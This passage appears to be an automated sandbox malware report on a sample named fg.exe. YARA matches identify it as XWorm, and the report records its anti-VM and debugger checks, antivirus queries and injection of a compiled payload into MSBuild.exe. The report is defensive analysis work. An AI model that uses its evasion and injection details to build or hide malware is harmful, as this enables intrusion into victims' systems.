            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: fg.exe PID: 7816, type: MEMORYSTR
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\fg.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\fg.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\fg.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2A00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\fg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 902Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 2.4 %
            Source: C:\Users\user\Desktop\fg.exe TID: 4712Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -23980767295822402s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3108Thread sleep count: 902 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3108Thread sleep count: 8953 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\fg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: Amcache.hve.19.drBinary or memory string: VMware
            Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.19.drBinary or memory string: vmci.sys
            Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.19.drBinary or memory string: VMware20,1
            Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\fg.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\fg.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num2, length, 12288, 64)
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\fg.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
            Compiles code for process injection (via .Net compiler)
            Source: C:\Users\user\Desktop\fg.exeFile written: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.0.csJump to dropped file
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\fg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\fg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A78008Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp" "c:\Users\user\AppData\Local\Temp\cy31atwy\CSC8910777A3B084AE58CA4772E6114D41.TMP"Jump to behavior
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
            Source: C:\Users\user\Desktop\fg.exeQueries volume information: C:\Users\user\Desktop\fg.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\fg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.19.drBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fg.exe PID: 7816, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6364, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 516, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE
